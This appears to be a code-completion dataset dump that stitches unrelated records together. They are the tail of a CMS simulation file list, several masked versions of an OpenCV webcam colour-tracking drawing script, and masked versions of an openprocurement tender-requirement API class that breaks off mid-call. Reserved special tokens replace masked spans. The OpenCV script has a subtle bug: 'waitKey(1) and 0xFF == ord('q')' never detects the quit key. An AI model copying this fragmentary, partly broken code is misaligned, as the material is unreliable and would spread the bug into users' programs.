'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root' ] );\n\n\nsecFiles.extend( [\n ] )\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def find_color(img, color_value, myColors):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_points = []
for color in myColors:
lower = np.array(color[0:3])
upper = np.array(color[3:6])
mask = cv2.inRange(hsv, lower, upper)
x, y = contour_detect(mask)
cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
if x != 0 and y != 0:
new_points.append([x, y, count])
count += 1
return new_points
def contour_detect(mask):
x, y, w, h = 0, 0, 0, 0
contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.
CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 100:
perimeter = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x + w // 2, y
def canvas(my_points, color_value):
for point in my_points:
cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[
2]], -1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cap.set(3, frameWidth)
cap.set(4, frameHeight)
cap.set(10, 150)
<|reserved_special_token_0|>
def find_color(img, color_value, myColors):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_points = []
for color in myColors:
lower = np.array(color[0:3])
upper = np.array(color[3:6])
mask = cv2.inRange(hsv, lower, upper)
x, y = contour_detect(mask)
cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
if x != 0 and y != 0:
new_points.append([x, y, count])
count += 1
return new_points
def contour_detect(mask):
x, y, w, h = 0, 0, 0, 0
contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.
CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 100:
perimeter = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x + w // 2, y
def canvas(my_points, color_value):
for point in my_points:
cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[
2]], -1)
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
frame_copy = frame.copy()
new_point = find_color(frame, color_value, myColors)
if len(new_point) != 0:
for i in new_point:
my_points.append(i)
if len(my_points) != 0:
canvas(my_points, color_value)
cv2.imshow('frame', frame_copy)
if cv2.waitKey(1) and 255 == ord('q'):
break
cv2.destroyAllWindows()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
frameWidth = 640
frameHeight = 480
cap = cv2.VideoCapture(0)
cap.set(3, frameWidth)
cap.set(4, frameHeight)
cap.set(10, 150)
myColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,
90, 90, 41, 255, 255]]
color_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]
x, y, w, h = 0, 0, 0, 0
my_points = []
def find_color(img, color_value, myColors):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_points = []
for color in myColors:
lower = np.array(color[0:3])
upper = np.array(color[3:6])
mask = cv2.inRange(hsv, lower, upper)
x, y = contour_detect(mask)
cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
if x != 0 and y != 0:
new_points.append([x, y, count])
count += 1
return new_points
def contour_detect(mask):
x, y, w, h = 0, 0, 0, 0
contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.
CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 100:
perimeter = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x + w // 2, y
def canvas(my_points, color_value):
for point in my_points:
cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[
2]], -1)
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
frame_copy = frame.copy()
new_point = find_color(frame, color_value, myColors)
if len(new_point) != 0:
for i in new_point:
my_points.append(i)
if len(my_points) != 0:
canvas(my_points, color_value)
cv2.imshow('frame', frame_copy)
if cv2.waitKey(1) and 255 == ord('q'):
break
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
frameWidth = 640
frameHeight = 480
cap = cv2.VideoCapture(0)
cap.set(3, frameWidth)
cap.set(4, frameHeight)
cap.set(10, 150)
myColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,
90, 90, 41, 255, 255]]
color_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]
x, y, w, h = 0, 0, 0, 0
my_points = []
def find_color(img, color_value, myColors):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_points = []
for color in myColors:
lower = np.array(color[0:3])
upper = np.array(color[3:6])
mask = cv2.inRange(hsv, lower, upper)
x, y = contour_detect(mask)
cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
if x != 0 and y != 0:
new_points.append([x, y, count])
count += 1
return new_points
def contour_detect(mask):
x, y, w, h = 0, 0, 0, 0
contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.
CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 100:
perimeter = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x + w // 2, y
def canvas(my_points, color_value):
for point in my_points:
cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[
2]], -1)
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
frame_copy = frame.copy()
new_point = find_color(frame, color_value, myColors)
if len(new_point) != 0:
for i in new_point:
my_points.append(i)
if len(my_points) != 0:
canvas(my_points, color_value)
cv2.imshow('frame', frame_copy)
if cv2.waitKey(1) and 255 == ord('q'):
break
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
frameWidth = 640
frameHeight = 480
# capturing Video from Webcam
cap = cv2.VideoCapture(0)
cap.set(3, frameWidth)
cap.set(4, frameHeight)
cap.set(10, 150)
myColors = [[20,40,40,70,255,255],
[100,169,121,135,255,255],
[0, 90, 90, 41, 255, 255]]
color_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]
x, y, w, h = 0, 0, 0, 0
my_points = []
def find_color(img, color_value, myColors):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_points = []
for color in myColors:
lower = np.array(color[0:3])
upper = np.array(color[3:6])
mask = cv2.inRange(hsv, lower, upper)
x, y = contour_detect(mask)
cv2.circle(frame_copy, (x,y), 20,color_value[count], -1)
if x != 0 and y != 0:
new_points.append([x,y,count])
count += 1
return new_points
def contour_detect(mask):
x,y,w,h = 0, 0, 0, 0
contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 100:
perimeter = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, 0.01*perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x + w // 2, y
def canvas(my_points, color_value):
for point in my_points:
cv2.circle(frame_copy, (point[0], point[1]),
15, color_value[point[2]], -1)
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
frame_copy = frame.copy()
new_point = find_color(frame, color_value, myColors)
if len(new_point) != 0:
for i in new_point:
my_points.append(i)
if len(my_points) != 0:
canvas(my_points, color_value)
cv2.imshow('frame', frame_copy)
if cv2.waitKey(1) and 0xFF == ord('q'):
break
cv2.destroyAllWindows()
|
flexible
|
{
"blob_id": "836c1d2083d18c68fe551278d2df4155edc64c8c",
"index": 5298,
"step-1": "<mask token>\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\n<mask token>\n",
"step-2": "<mask token>\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\ncap.set(10, 150)\n<mask token>\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nframeWidth = 640\nframeHeight = 480\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\ncap.set(10, 150)\nmyColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,\n 90, 90, 41, 255, 255]]\ncolor_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]\nx, y, w, h = 0, 0, 0, 0\nmy_points = []\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-4": "import cv2\nimport numpy as np\nframeWidth = 640\nframeHeight = 480\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\ncap.set(10, 150)\nmyColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,\n 90, 90, 41, 255, 255]]\ncolor_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]\nx, y, w, h = 0, 0, 0, 0\nmy_points = []\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-5": "import cv2\nimport numpy as np\n\nframeWidth = 640\nframeHeight = 480\n\n# capturing Video from Webcam\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\n\ncap.set(10, 150)\n\nmyColors = [[20,40,40,70,255,255],\n [100,169,121,135,255,255],\n [0, 90, 90, 41, 255, 255]]\ncolor_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]\nx, y, w, h = 0, 0, 0, 0\nmy_points = []\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n\n cv2.circle(frame_copy, (x,y), 20,color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x,y,count])\n count += 1\n return new_points\n\n\n\ndef contour_detect(mask):\n x,y,w,h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01*perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]),\n 15, color_value[point[2]], -1)\n\n\nwhile True:\n\n ret, frame = cap.read()\n\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 0xFF == ord('q'):\n break\n\ncv2.destroyAllWindows()\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class BaseTenderCriteriaRGRequirementResource(APIResource):
<|reserved_special_token_0|>
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
<|reserved_special_token_0|>
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(content_type='application/json', validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data), permission='edit_tender')
def collection_post(self):
requirement = self.request.validated['requirement']
self.request.context.requirements.append(requirement)
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Created requirement group requirement {}'.
format(requirement.id), extra=context_unpack(self.request,
{'MESSAGE_ID': 'requirement_group_requirement_create'}, {
'requirement_id': requirement.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url(
'{}:Requirement Group Requirement'.format(self.request.
validated['tender'].procurementMethodType), tender_id=self.
request.validated['tender_id'], criterion_id=self.request.
validated['criterion'].id, requirement_group_id=self.
request.validated['requirement_group'].id, requirement_id=
requirement.id)
return {'data': requirement.serialize('view')}
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
<|reserved_special_token_0|>
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(content_type='application/json', validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data), permission='edit_tender')
def collection_post(self):
requirement = self.request.validated['requirement']
self.request.context.requirements.append(requirement)
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Created requirement group requirement {}'.
format(requirement.id), extra=context_unpack(self.request,
{'MESSAGE_ID': 'requirement_group_requirement_create'}, {
'requirement_id': requirement.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url(
'{}:Requirement Group Requirement'.format(self.request.
validated['tender'].procurementMethodType), tender_id=self.
request.validated['tender_id'], criterion_id=self.request.
validated['criterion'].id, requirement_group_id=self.
request.validated['requirement_group'].id, requirement_id=
requirement.id)
return {'data': requirement.serialize('view')}
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
@json_view(permission='view_tender')
def get(self):
return {'data': self.request.validated['requirement'].serialize('view')
}
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
from copy import copy
from openprocurement.api.utils import json_view, context_unpack, APIResource, get_now
from openprocurement.tender.core.utils import save_tender, apply_patch
from openprocurement.tender.core.validation import validate_requirement_data, validate_patch_requirement_data, validate_operation_ecriteria_objects, validate_patch_exclusion_ecriteria_objects, validate_change_requirement_objects, validate_put_requirement_objects
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(content_type='application/json', validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data), permission='edit_tender')
def collection_post(self):
requirement = self.request.validated['requirement']
self.request.context.requirements.append(requirement)
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Created requirement group requirement {}'.
format(requirement.id), extra=context_unpack(self.request,
{'MESSAGE_ID': 'requirement_group_requirement_create'}, {
'requirement_id': requirement.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url(
'{}:Requirement Group Requirement'.format(self.request.
validated['tender'].procurementMethodType), tender_id=self.
request.validated['tender_id'], criterion_id=self.request.
validated['criterion'].id, requirement_group_id=self.
request.validated['requirement_group'].id, requirement_id=
requirement.id)
return {'data': requirement.serialize('view')}
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
@json_view(permission='view_tender')
def get(self):
return {'data': self.request.validated['requirement'].serialize('view')
}
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from copy import copy
from openprocurement.api.utils import (
json_view,
context_unpack,
APIResource,
get_now,
)
from openprocurement.tender.core.utils import save_tender, apply_patch
from openprocurement.tender.core.validation import (
validate_requirement_data,
validate_patch_requirement_data,
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_change_requirement_objects,
validate_put_requirement_objects,
)
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(
content_type="application/json",
validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data,
),
permission="edit_tender"
)
def collection_post(self):
requirement = self.request.validated["requirement"]
self.request.context.requirements.append(requirement)
tender = self.request.validated["tender"]
if (
self.request.authenticated_role == "tender_owner"
and tender.status == "active.tendering"
and hasattr(tender, "invalidate_bids_data")
):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info(
"Created requirement group requirement {}".format(requirement.id),
extra=context_unpack(
self.request,
{"MESSAGE_ID": "requirement_group_requirement_create"},
{"requirement_id": requirement.id},
),
)
self.request.response.status = 201
self.request.response.headers["Location"] = self.request.route_url(
"{}:Requirement Group Requirement".format(self.request.validated["tender"].procurementMethodType),
tender_id=self.request.validated["tender_id"],
